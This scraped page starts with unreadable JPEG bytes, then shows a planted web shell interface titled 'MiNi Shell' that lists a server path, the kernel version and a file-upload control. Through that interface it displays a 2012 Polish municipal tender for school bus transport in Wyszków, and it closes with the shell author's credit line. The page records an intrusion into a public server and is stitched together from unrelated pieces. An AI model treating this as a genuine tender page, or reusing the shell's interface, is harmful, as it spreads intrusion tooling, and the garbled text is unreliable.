JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121211/501764-N-2012.html

<p class="kh_header"><b>Wyszków: DOWÓZ DZIECI DO SZKÓŁ GMINY WYSZKÓW 
W OKRESIE 01.01.2013 - 31.12.2013</b><br>
<b>Numer ogłoszenia: 501764 - 2012; data zamieszczenia: 11.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Placówek Oświatowych w Wyszkowie , ul. 11 Listopada 50, 07-200 Wyszków, woj. mazowieckie, tel. 029 7425830, faks 029 7423595.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zopo-wyszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOWÓZ DZIECI DO SZKÓŁ GMINY WYSZKÓW 
W OKRESIE 01.01.2013 - 31.12.2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.przywiezienie i odwiezienie uczniów Gimnazjum nr 1 w Wyszkowie ul. Geodetów 45  w okresie 01.01.2013 - 31.12.2013 roku;
2.przywiezienie i odwiezienie uczniów Szkoły Podstawowej w Lucynowie w okresie 01.01.2013 - 31.12.2013 roku;
3.przywiezienie i odwiezienie uczniów Zespołu Szkół Rybienko Leśne w Wyszkowie  ul. Batorego 6   w okresie 01.01.2013 - 31.12.2013 roku;
4. przywiezienie i odwiezienie uczniów z terenu Gminy Wyszków szkół podstawowych  do i z Pływalni WOSiR w Wyszkowie, ul. Geodetów 45 w okresie marzec-czerwiec 2013, wrzesień listopad 2013 roku;
5.przywiezienie i odwiezienie uczniów Zespołu Szkół w Rybnie w okresie 01.01.2013 - 31.12.2013 roku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium wnoszone 1 dzień przed terminem składania ofert, przy czym wpłata przelewem może być jedna na kilka zadań (ośrodków). Wadium w wysokości: 7.500,-  zł. (siedem tysięcy pięćset złotych.)

1	ośrodek Nr 1 - wadium,      3.000,- zł.  (trzy tysiące zł)
2	ośrodek Nr 2 -  wadium,      1.000,- zł.  (jeden tysiąc zł)
3	ośrodek Nr 3 -  wadium.      2.000,- zł.  (dwa tysiące zł)
4	ośrodek Nr 4 - wadium           500,- zł   (pięćset zł)
5	ośrodek Nr 5 -  wadium        1.000,- zł.  (jeden tysiąc zł) 

Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego:
Bank Spółdzielczy w Wyszkowie  63 89310003 0002 1773 2029 0003 z dopiskiem dowóz dzieci.
Wadium musi znaleźć się na koncie zamawiającego na 1 dzień przed terminem składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać koncesję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób autobusem; posiada uprawnienia do występowania w obrocie prawnym, zgodnie z wymogami ustawowymi tzn. prowadzą działalność zarejestrowaną w Krajowym Rejestrze Sądowym lub innym organie ewidencji działalności gospodarczej;
Wykonawcy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (Art. 24 ust. 1 i 2)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada doświadczenie w realizacji podobnych zamówień tj. przewóz dzieci.                    (Zał. Nr 5 do SIWZ) wraz  z dokumentami potwierdzającymi, że usługi te zostały wykonane                  z należną starannością.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada  autobusy niezbędne do terminowego i prawidłowego wykonania zamówienia, tj. odpowiednio: (Zał Nr 3 i 4 do SIWZ)
-dowóz do Ośrodka 1 -  
I Kierunek - 2 autobusy (2 minimum 50 miejsc siedzących), 
w zależności od organizacji roku szkolnego w tygodniu potrzeba 1 autokar  (minimum 40 miejsc siedzących) tylko na rano.
W zależności od organizacji roku szkolnego od miesiąca września 2013 ilość kursów może ulec zmianie (zwiększenie o 2 kursy 1 autokar dodatkowo minimum 50 miejsc siedzących). W godzinach rannych może zaistnieć potrzeba jednoczesnego wyjazdu 3 autokarów na I kurs - 650- 750    tylko rano. ( Ilość wyjazdów rano może ulec zmianie w zależności od organizacji roku szkolnego).
Łącznie na ośrodek nr 1 na I kierunek potrzeba 2 autokary 50 miejscowe, 1 minimum 40 miejscowy i od września 2013 w zależności od organizacji roku szkolnego potrzeba 1 autokar 50 miejscowy. Razem 3 autokary 50 miejscowe, 1 autokar 40 miejscowy.
II Kierunek - 2 autobusy ( 1 minimum 50 miejsc siedzących, 1 minimum 40 miejsc siedzących) 
Łącznie dowóz do Ośrodka nr 1 (I i II Kierunek potrzeba 4 autokary 50 osobowe i 2 autokary 40 osobowe)
- dowóz do Ośrodka 2 - 1 autobus (minimum 50 miejsc siedzących),
- dowóz do Ośrodka 3 - 4 autobusy (3 minimum 50 miejsc siedzących, 1 minimum 40 miejsc siedzących), dodatkowo  2 autobusy minimum 40 miejsc siedzących 2 razy w tygodniu 1 kurs 
Łącznie dowóz do ośrodka nr 3 potrzeba 3 autokary 50 miejscowe i 3 autokary 40 miejscowe.
- dowóz do Ośrodka 4 - 1 autobus (minimum 40 miejsc siedzących)
- dowóz do Ośrodka 5-   2 autobusy ( 1 minimum 50 miejsc siedzących, 1 minimum 40 miejsc siedzących, 1 busik 10 osobowy lub autokar 20 miejscowy)
Posiadanie i podstawienie, w przypadku awarii autobusu, innego pojazdu umożliwiającego kontynuację przewozu, w ciągu maksymalnie 30 minut. 
W związku z tym Wykonawca musi posiadać minimum 1 autobus więcej na każdy Ośrodek, na który Wykonawca będzie składał ofertę, a na Ośrodek Nr 5 dodatkowo bus 10 osobowy.

W przypadku gdy Wykonawca składa ofertę na wszystkie kierunki musi posiadać 16 autokarów ( w tym 9 szt. autokarów 50 osobowych i 7 autokarów 40 osobowych) i busa 10 osobowego lub autobus 20 miejscowy. Dodatkowo 5 autokarów w razie awarii plus 1 bus lub autokar 20 miejscowy. Łącznie potrzeba 21 autokarów plus 2 busy lub 2 autokary 20 miejscowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować personelem zdolnym do wykonania zamówienia, czyli:
Wykonawca ma do dyspozycji odpowiednio wykwalifikowany personel zapewniający wykonanie przedmiotu zamówienia. tj.: (Zał Nr 2 do SIWZ)
- dowóz do Ośrodka 1 - 6 kierowców,  
- dowóz do Ośrodka 2 - 1 kierowca,
- dowóz do Ośrodka 3 - 6 kierowców,
- dowóz do Ośrodka 4 - 1 kierowca.
- Dowóz do Ośrodka 5 -  3 kierowców 
Łącznie potrzeba 17 kierowców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej właściwe wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>nie należy przedkładać oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne  zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
1)	zmiany w zakresie ceny zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa, w tym zmiany stawek VAT.
2)	zmiana terminu rozpoczęcia realizacji zamówienia w przypadku przedłużającej się procedury                   o  udzielanie zamówienia.
Warunki, na jakich zamawiający wymaga, aby została zawarta umowa w sprawie zamówienia publicznego określa wzór umowy stanowiący załącznik do niniejszej SIWZ  (patrz III część  SIWZ)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zopo-wyszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Placówek Oświatowych w Wyszkowie
ul. 11 Listopada 50
07-200 Wyszków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2012 godzina 09:00, miejsce: Zespół Obsługi Placówek Oświatowych w Wyszkowie
ul. 11 Listopada 50
07-200 Wyszków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz dzieci do szkół Gminy Wyszków
Ośrodek nr 1 - Gimnazjum Nr 1 w Wyszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ośrodek 1 - Gimnazjum Nr 1 w Wyszkowie - przywiezienie i odwiezienie uczniów Gimnazjum Nr 1 z następujących miejscowości: Leszczydół Działki, Leszczydół Stary, Łosinno, Natalin, Olszanka, Sitno, Rybienko Nowe, Tulewo, Wielątki, Zakręzie, Zaolzie;
I kierunek - Leszczydół Stary (sklep nr 1) Leszczydół Stary (sklep nr 2),Leszczydół Działki, Leszczydół Stary (sklep),Leszczydół Stary (krzyżówki), Wielątki, Łosinno, Zaolzie,Łosinno (szkoła),Olszanka(przystanek PKS) Sitno, Olszanka (szkoła)Gimnazjum Nr 1
II kierunek - Zakręzie,Natalin (pętla),Szkoła Podstawowa Nr 2,Żłobko-Przedszkole Nr 1,Gimnazjum Nr 2 w Wyszkowie 
Łącznie dowóz do Ośrodka nr 1 (I i II Kierunek potrzeba 4 autokary 50 osobowe i 2 autokary 40 osobowe)
Ze względu na zmiany w planie lekcyjnym wynikającym z organizacji pracy szkoły mogą ulec zmianie godziny przywozu i odwozu. 
Zamawiający bądź Dyrektor każdego z Ośrodków poinformuje Wykonawcę o takiej zmianie nie później niż na 30 minut przed planowaną zmianą w danym dniu roboczym, którego ta zmiana dotyczy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz dzieci do szkół Gminy Wyszków
Ośrodek nr 2 - Szkoła pOdstawowa w Lucynowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ośrodek 2 - Szkoła Podstawowa w Lucynowie - przywiezienie i odwiezienie uczniów z miejscowości: Ślubów, Deskurów, Tumanek, Fidest, Lucynów Duży, 
I kierunek - Ślubów, Deskurów,Tumanek,Lucynów (szkoła)
II kierunek - Fidest,Lucynów Duży,Tumanek, Lucynów (szkoła)
ze względu na organizację pracy szkoły istnieje konieczność realizacji min. 3 kursów dziennie w następujących godzinach: I kurs - 650- 750, II kurs - 1130-1230, III kurs - 1415-1515; 
1 autokar (minimum 50 miejsc siedzących).
Ze względu na zmiany w planie lekcyjnym wynikającym z organizacji pracy szkoły mogą ulec zmianie godziny przywozu i odwozu. 
Zamawiający bądź Dyrektor każdego z Ośrodków poinformuje Wykonawcę o takiej zmianie nie później niż na 30 minut przed planowaną zmianą w danym dniu roboczym, którego ta zmiana dotyczy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dowóz dzieci do szkoł Gminy Wyszków
Ośrodek nr 3 - Zespół Szkół Rybienko Leśne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ośrodek 3 - Zespół Szkół Rybienko Leśne w Wyszkowie - przywiezienie i odwiezienie uczniów z miejscowości: Deskurów, Fidest, Lucynów Mały, Lucynów Duży (remiza), Ślubów, Tumanek, Kamieńczyk, Świniotop, Puste Łąki. Ze względu na organizację pracy szkoły istnieje konieczność realizacji min. 8 kursów dziennie w 3 kierunkach  w następujących godzinach:
przywóz - godz. 700, 1 autokar ( minimum 50 miejsc siedzących)
I kierunek - Lucynów,Tumanek,Fidest,Lucynów Duży,Lucynów  Mały,Rybienko 
II kierunek -   przywóz 710, Lucynów , Ślubów,Deskurów,Rybienko, 1 autokar        ( minimum 40 miejsc siedzących)
przywóz - godz. 700, 2 autokary (1 minimum 50 miejsc siedzących, 1 minimum 50 miejsc siedzących) 
III kierunek - Wyszków,Puste Łąki,Świniotop,Kamieńczyk,Rybienko
odwóz uczniów z wyżej wymienionych tras w godz. 1340 - 1440.
Dodatkowo 2 razy w tygodniu (poniedziałek, wtorek, ) podstawi 2 autokary w godzinach 15.30 pod szkołę na odwóz dzieci. 1 autokar (minimum 40 miejsc siedzących) w kierunku Kamieńczyk - Puste Łąki- Świniotop, 2 autokar  (minimum 40 miejsc siedzących) w kierunku Tumanek, Fidest, Deskurów, Ślubów, Lucynów Duży .
Razem potrzeba 4 autokary (1 minimum 40 miejsc siedzących, 3 minimum 50 miejsc siedzących). 
W przypadku nałożenia się kursów 2 dodatkowe autokary ( minimum 40 miejsc siedzących.)
Ze względu na zmiany w planie lekcyjnym wynikającym z organizacji pracy szkoły mogą ulec zmianie godziny przywozu i odwozu. 
Zamawiający bądź Dyrektor każdego z Ośrodków poinformuje Wykonawcę o takiej zmianie nie później niż na 30 minut przed planowaną zmianą w danym dniu roboczym, którego ta zmiana dotyczy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pływalnia WOSIR w Wyszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ośrodek 4 - Pływalnia WOSiR w Wyszkowie - przywiezienie i odwiezienie uczniów z miejscowości: Wyszków (SP 1, SP 2), Skuszew, Rybno, Rybienko Leśne (SP 3),  Lucynów, Leszczydół Stary, Leszczydół Nowiny, 
ogólna ilość uczniów klas drugich - 350,
w godzinach 800- 1500 przez pięć dni w tygodniu, (w okresie marzec - czerwiec 2013, wrzesień - listopad 2013)
1 autokar (minimum 40 miejsc siedzących).
Ogółem tygodniowy przebieg przywozu i odwozu około 265 km w zależności od obowiązującego harmonogramu dowozu 

Ze względu na zmiany w planie lekcyjnym wynikającym z organizacji pracy szkoły mogą ulec zmianie godziny przywozu i odwozu. W przypadku braku chętnych uczestników zajęcia mogą ulec odwołaniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dowóz dzieci ze szkół Gminy Wyszków
Ośrodek nr 5 - Zespół Szkół w Rybnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ośrodek 5  - Zespół Szkół w Rybnie   przywiezienie i odwiezienie uczniów Gimnazjum w Rybnie
Z miejscowości Gulczewo (pętla),Gulczewo (wieś) Gulczewo (żwirownia)Tulewo,Rybno,Rybienko Nowe,Gimnazjum w Rybnie
ze względu na organizację pracy szkoły istnieje konieczność realizacji min. 4  kursów dziennie (2 kursy przywóz i 2 kursy odwóz)  w następujących godzinach: I kurs - 650- 750, II kurs - 1330-1610, 
2 autokary (1 minimum 50 miejsc siedzących, 1 minimum 40 miejsc siedzących). 
dodatkowo potrzeba busik 10 osobowy lub  autokar 20 miejscowy na 1 kurs dziennie (przywóz lub odwóz w zależności od planu zajęć) w godzinach 930- 1100
Ze względu na zmiany w planie lekcyjnym wynikającym z organizacji pracy szkoły mogą ulec zmianie godziny przywozu i odwozu. 
Zamawiający bądź Dyrektor każdego z Ośrodków poinformuje Wykonawcę o takiej zmianie nie później niż na 30 minut przed planowaną zmianą w danym dniu roboczym, którego ta zmiana dotyczy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com